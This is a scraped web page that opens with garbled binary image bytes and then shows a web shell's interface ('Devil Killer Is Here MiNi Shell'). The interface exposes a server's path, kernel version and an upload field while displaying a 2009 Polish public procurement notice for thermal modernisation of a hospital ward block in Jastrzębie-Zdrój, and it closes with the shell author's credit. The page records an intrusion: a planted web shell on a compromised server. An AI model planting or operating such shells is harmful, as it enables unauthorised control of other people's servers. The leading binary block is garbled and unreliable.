JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090429/126630-N-2009.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Termomodernizacja bloku łóżkowego Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu Zdroju (DZP/38/382-29/09)</b><br>
<b>Numer ogłoszenia: 126630 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny Nr 2 w Jastrzębiu Zdroju , al. Jana Pawła II 7, 44-335 Jastrzębie-Zdrój, woj. śląskie, tel. 032 4784561.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wss2.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja bloku łóżkowego Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu Zdroju (DZP/38/382-29/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Termomodernizacja bloku łóżkowego Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu Zdroju.
Blok łóżkowy wchodzi w skład kompleksu budynków Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu Zdroju. Blok łóżkowy to jedenasto kondygnacyjny podpiwniczony budynek z poddaszem użytkowym. Budynek składa się z 5 segmentów (16,7 x 14,4m każdy) oddzielonych od siebie dylatacjami. Dane techniczne bloku łóżkowego: Powierzchnia zabudowy: 1214 m2, Powierzchnia użytkowa: 10 484 m2, Kubatura: 54 000 m3, Wymiary budynku: - wysokość: 40, 5 m, - szerokość: 14,4 m, - długość: 82,4 m.
Przedmiot zamówienia podzielony został na 2 części (zadania):
Część A - Zadanie nr 1 - Modernizacja instalacji centralnego ogrzewania i wykonanie układu kolektorów słonecznych.
1. Modernizację instalacji centralnego ogrzewania. Modernizacja c.o. polegać będzie na przeniesieniu poziomych przewodów rozprowadzających z kondygnacji technicznej na poziom piwnicy, zainstalowaniu zaworów z głowicami termostatycznymi przy grzejnikach, zaworów regulacyjnych podpionowych oraz zamontowaniu w najwyższych punktach automatycznych odpowietrzników przy zachowaniu istniejących grzejników oraz pionowych przewodów stalowych.
2. Wykonanie układu kolektorów słonecznych zapewniających częściowe pokrycie zapotrzebowania na ciepło do przygotowania ciepłej wody użytkowej.
W budynku istnieją dwie odrębne instalacje cwu z osobnymi węzłami. Wyższe kondygnacje budynku należą do strefy I cwu, a niższe kondygnacje do strefy II cwu. 
Instalacja solarna dla obiektu będzie się składać z dwóch oddzielnych instalacji, dla strefy I cwu z liczbą 120 kolektorów i dla strefy II cwu z liczbą 105 kolektorów. Łączna ilość kolektorów: 225. Kolektory zabudowane będą na dachu budynku.
Oprócz robót zasadniczych wymienionych powyżej Wykonawca zabezpieczy wykonanie na własny koszt następujących prac: a) wykonanie odpowiednich zabezpieczeń bhp, barier ochronnych; b) uzgodnienia oraz zlecenie nadzorów branżowych (w razie konieczności); c) inne nie wymienione wyżej, a limitujace wykonanie inwestycji zgodnie z jego przeznaczeniem.
Część B - Zadanie nr 2 - Wymiana stolarki zewnętrznej bloku łóżkowego, docieplenie elewacji i dachu budynku.
Zakres prac: - ściany zewnętrzne podłużne: demontaż okładzin zewnętrznych (blachy, płyty szklane). Ocieplenie metodą BSO- metoda lekka mokra z zastosowaniem wełny mineralnej gr. 12 cm; - ściany zewnętrzne szczytowe: likwidacja warstwy zewnętrznej tj. skuciu płytek. Ocieplenie metodą BSO- metoda lekka mokra z zastosowaniem wełny mineralnej gr. 12 cm; - ściany przydalatacyjne oddzielone 18 cm szczeliną. Ocieplenie wełna mineralną o gr. 17-18 cm na pełną głębokość szczeliny (do 1 m); - stropodach: renowacja istniejącego pokrycia, położenie warstwy papy wentylacyjnej, położeniu 15 cm twardego styropianu EPS 150 z warstwą podkładową i 2 warstwy papy- podkładowej i termozgrzewalnej, -wymiana okien w piwnicach (ok. 54 szt. 0,6 x 0,6 m), wymiana okien w kondygnacjach naziemnych (ok. 580 szt. 1,6 x 1,8 m), wymiana okien na poddaszu (ok. 180 szt. 0,4 x 1,3 m), - wymiana drzwi zewnętrznych (4 sztuki).
Oprócz robót zasadniczych wymienionych powyżej Wykonawca zabezpieczy wykonanie na własny koszt następujących prac: a) wykonanie odpowiednich zabezpieczeń bhp, barier ochronnych; b) uzgodnienia oraz zlecenie nadzorów branżowych (w razie konieczności); c) inne nie wymienione wyżej, a limitujace wykonanie inwestycji zgodnie z jego przeznaczeniem.
Szczegółowy opis przedmiotu zamówienia określa dokumentacja techniczna (projekt budowlany) oraz Specyfikacje Techniczne Wykonania i Odbioru Robót, które stanowią załącznik nr 6 do specyfikacji istotnych warunków zamówienia (przedmiar robót stanowi tylko materiał pomocniczy).
Zamawiający posiada pozwolenie na budowę w zakresie Części B - Zadania nr 2 - Wymiana stolarki zewnętrznej bloku łóżkowego, docieplenie elewacji i dachu budynku oraz zgłosił rozpoczęcie prac w zakresie Części A - Zadanie nr 2 - Modernizacja instalacji centralnego ogrzewania i wykonanie układu kolektorów słonecznych.
Zgodnie z art. 36 ust. 4 Prawa zamówień publicznych w ofercie należy wskazać część zamówienia, której wykonanie ma wykonać podwykonawca - stosowną deklarację do wypełnienia przez wykonawcę zawarto w Formularzu oferty.
Zamawiający zaleca, by wykonawca zapoznał się z terenem budowy przed złożeniem oferty i uzyskał od Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu Zdroju, wszelkie niezbędne informacje i dane, jakie mogą mieć wpływ na ryzyko i okoliczności realizacji przedmiotu zamówienia.
Wykonawca zobowiązany jest zaakceptować wzór umowy, stanowiący integralną część specyfikacji istotnych warunków zamówienia (załącznik nr 5) - stosowną deklarację zawarto w Formularzu oferty (załącznik nr 1).
Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne Części -Zadania (Część A - Zadanie nr 1; Część B - Zadanie nr 2).
Zamawiający nie dopuszcza możliwości składania ofert równoważnych lub wariantowych.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
Zamawiający nie zamierza wybierać najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.41.00.00-4, 45.44.30.00-4, 45.32.00.00-6, 45.32.40.00-4, 45.23.00.00-7, 45.26.24.00-5, 45.26.24.20-1, 45.31.00.00-3, 45.33.20.00-6, 45.33.11.00-7, 45.45.30.00-7, 45.42.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:
- dla Części A - Zadania nr 1 - Modernizacja instalacji centralnego ogrzewania i wykonanie układu kolektorów słonecznych - 50 000,00 zł
- dla Części B - Zadania nr 2 - Wymiana stolarki zewnętrznej bloku łóżkowego, docieplenie elewacji i dachu budynku - 125 000,00 zł

Wadium może być wniesione w jednej lub kilku następujących formach: a) pieniądzu (płatne przelewem na konto: ING Bank Śl. S.A. Filia Jastrzębie, nr konta: 62105016051000002217925631); b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; c) gwarancjach bankowych; d) gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (DZ. U. z 2007 r. Nr 42, poz. 275).
Oferta nie zabezpieczona wadium w wymaganej formie spowoduje wykluczenie Wykonawcy z postępowania.
Za skuteczne wniesienie uznaje się wadium, które znajdzie się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert (dot. wadium wniesionego w pieniądzu) lub zostanie wniesione wraz z ofertą (dot. wadium wniesionego w pozostałej formie).
Kopię dokumentu potwierdzającego wniesienie wadium należy załączyć do oferty, zaś oryginał dokumentu (gwarancja bankowa, ubezpieczeniowa, itd.) należy złożyć w oddzielnej kopercie wraz z ofertą.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
Zamawiający zwraca wadium, jeżeli: a) upłynął termin związania ofertą; b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy; c) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy zgodnie z art. 46 ust. 2 ustawy Pzp.
Wadium wniesione w pieniądzu zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy PZP, nie złożył dokumentów, o których mowa w art. 25 ust. 1 Ustawy Pzp, lub pełnomocnictw, chyba że udowodni, ze wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; b) nie wniósł zabezpieczenia należytego wykonania umowy; c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy niewykluczeni na podstawie art. 24 Ustawy PZP, spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ust. 1 Ustawy PZP.
Wykonawcy biorący udział w postępowaniu muszą spełnić następujące warunki i potwierdzić ich spełnienie wskazanymi dokumentami: 1) Wykonawcy muszą wykazać, że  posiadają uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlegają wykluczeniu na podstawie art. 24 Ustawy PZP; 2)Wykonawcy muszą wykazać, że posiadają niezbędną wiedzę 
i doświadczenie oraz dysponują lub będą dysponować potencjałem technicznym 
i osobami zdolnymi do wykonania zadania; 3) Wykonawcy muszą wykazać, że znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. W przypadku zaistnienia przesłanki określonej w art. 24 Ustawy PZP Zamawiający wykluczy Wykonawcę z postępowania.
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania warunków udziału w postępowaniu wymaganych od Wykonawców zostanie dokonana wg formuły - spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) obowiązuje załączenie pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie może wynikać
z treści umowy konsorcjum lub treści umowy spółki cywilnej;
2) Oświadczenie z art. 22 ust. 1 o spełnianiu warunków udziału w postępowaniu; 3)Wykaz wykonanej co najmniej jednej roboty budowlanej w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia w zakresie oferowanego zadania z podaniem jej wartości oraz daty i miejsca wykonania wraz z dokumentami, np. referencje, potwierdzającymi, że robota ta została wykonana należycie:
- w przypadku złożenia oferty na Część A - Zadanie nr 1 przedmiotu zamówienia co najmniej jedną inwestycję o wartości minimum 400 000,00 zł netto o podobnym charakterze;
- w przypadku złożenia oferty na Część B - Zadanie nr 2 przedmiotu zamówienia co najmniej jedną inwestycję o wartości minimum 1 600 000,0 zł netto o podobnym charakterze; 4) Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia; 5) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia (jeżeli wykonawca w załączniku nr 4 wskazał osoby, którymi będzie dysponował); 6) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w procesie budowy przedmiotu zamówienia posiadają wymagane uprawnienia budowlane zgodnie z art. 14 ustawy z dnia 7 lipca 1994 r. Prawa Budowlanego:
- w przypadku złożenia oferty na Część A - Zadanie nr 1 przedmiotu zamówienia wykazanie co najmniej jednej osoby z uprawnieniami budowlanymi o specjalności instalacyjnej (w zakresie sieic instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych) do pełnienia funkcji kierownika robót wraz z kserokopią uprawnień i aktualnym na dzień złożenia oferty zaświadczeniem o przynależności do terytorialnego organu samorządu zawodowego;
- w przypadku złożenia oferty na Część B - Zadanie nr 2 przedmiotu zamówienia wykazanie co najmniej jednej osoby z uprawnieniami budowlanymi do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej do pełnienia funkcji kierownika robót wraz z kserokopią uprawnień i aktualnym na dzień złożenia oferty zaświadczeniem o przynależności do terytorialnego organu samorządu zawodowego; 7) Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności:
- w przypadku złożenia oferty na Część A - Zadanie nr 1 przedmiotu zamówienia na sumę nie mniejszą niż 700 000,00 zł 
- w przypadku złożenia oferty na Część B - Zadanie nr 2 przedmiotu zamówienia na sumę nie mniejszą niż 1 700 000,00 zł; 8) Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytowa wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert:
- w przypadku złożenia oferty na Część A - Zadanie nr 1 przedmiotu zamówienia o sumie nie mniejszej niż 600 000,00 zł brutto;
- w przypadku złożenia oferty na Część B - Zadanie nr 2 przedmiotu zamówienia o sumie nie mniejszej niż 1 000 000,00 zł brutto.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wss2.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny Nr 2, AL. Jana Pawła II 7 44-330 Jastrzębie Zdrój, Dział Zamówień Publicznych, Zaopatrzenia i Marketingu - pok. nr 9, XI piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny Nr 2, AL. Jana Pawła II 7 44-330 Jastrzębie Zdrój, Dział Zamówień Publicznych, Zaopatrzenia i Marketingu - pok. nr 9, XI piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja instalacji centralnego ogrzewania i wykonanie układu kolektorów słonecznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Modernizację instalacji centralnego ogrzewania.
Modernizacja c.o. polegać będzie na przeniesieniu poziomych przewodów rozprowadzających z kondygnacji technicznej na poziom piwnicy, zainstalowaniu zaworów z głowicami termostatycznymi przy grzejnikach, zaworów regulacyjnych podpionowych oraz zamontowaniu w najwyższych punktach automatycznych odpowietrzników przy zachowaniu istniejących grzejników oraz pionowych przewodów stalowych.
2. Wykonanie układu kolektorów słonecznych zapewniających częściowe pokrycie zapotrzebowania na ciepło do przygotowania ciepłej wody użytkowej.
W budynku istnieją dwie odrębne instalacje cwu z osobnymi węzłami. Wyższe kondygnacje budynku należą do strefy I cwu, a niższe kondygnacje do strefy II cwu. 
Instalacja solarna dla obiektu będzie się składać z dwóch oddzielnych instalacji, dla strefy I cwu z liczbą 120 kolektorów i dla strefy II cwu z liczbą 105 kolektorów. Łączna ilość kolektorów: 225. Kolektory zabudowane będą na dachu budynku..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.31.00.00-3, 45.33.20.00-6, 45.33.11.00-7, 45.45.30.00-7, 45.42.10.00-4, 45.26.24.00-5, 45.26.24.20-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana stolarki zewnętrznej bloku łóżkowego, docieplenie elewacji i dachu budynku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac:
- ściany zewnętrzne podłużne: demontaż okładzin zewnętrznych (blachy, płyty szklane). Ocieplenie metodą BSO- metoda lekka mokra z zastosowaniem wełny mineralnej gr. 12 cm;
- ściany zewnętrzne szczytowe: likwidacja warstwy zewnętrznej tj. skuciu płytek. Ocieplenie metodą BSO- metoda lekka mokra z zastosowaniem wełny mineralnej gr. 12 cm;
- ściany przydalatacyjne oddzielone 18 cm szczeliną. Ocieplenie wełna mineralną o gr. 17-18 cm na pełną głębokość szczeliny ( do 1 m);
- stropodach: renowacja istniejącego pokrycia, położenie warstwy papy wentylacyjnej, położeniu 15 cm twardego styropianu EPS 150 z warstwą podkładową i 2 warstwy papy- podkładowej i termozgrzewalnej,
- wymiana okien w piwnicach (ok. 54 szt. 0,6 x 0,6 m), wymiana okien w kondygnacjach naziemnych (ok. 580 szt. 1,6 x 1,8 m), wymiana okien na poddaszu (ok. 180 szt. 0,4 x 1,3 m),
- wymiana drzwi zewnętrznych (4 sztuki)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.41.00.00-4, 45.44.30.00-4, 45.32.00.00-6, 45.32.40.00-4, 45.23.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com